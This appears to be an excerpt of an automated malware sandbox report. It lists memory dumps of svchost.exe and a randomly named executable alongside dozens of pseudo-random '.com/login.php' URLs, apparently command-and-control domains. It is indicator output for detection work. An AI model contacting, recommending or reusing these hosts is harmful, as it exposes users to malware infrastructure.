PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2711510595.0000000008F2D000.00000004.00000010.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000156A000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lygygin.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337019540.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330643505.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjuj.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygylur.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425636553.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2484249134.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197653218.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymoj.com/login.php
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymyn.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynyr.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysen.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2751476610.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygytix.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywor.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywyj.com/login.php
Source: svchost.exe, 00000002.00000003.2360864557.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxux.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349255775.0000000003379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfud.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
Source: svchost.exe, 00000002.00000003.2396904091.000000000331D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387196147.000000000331C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385326544.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.0000000001555000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376391418.000000000331E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376466077.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375586174.000000000332D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379454788.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375980019.0000000003321000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381729845.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377198818.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376798591.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymij.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymyr.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytin.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjix.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2507122526.00000000040F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2920308111.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2929340762.0000000009379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2915948048.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2916039850.0000000009374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylen.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2694181112.00000000040F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/H
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/login.php
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymud.com/
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310717488.000000000331A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311969896.000000000331C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymud.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.2334241023.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336999342.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysud.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytar.com/login.php
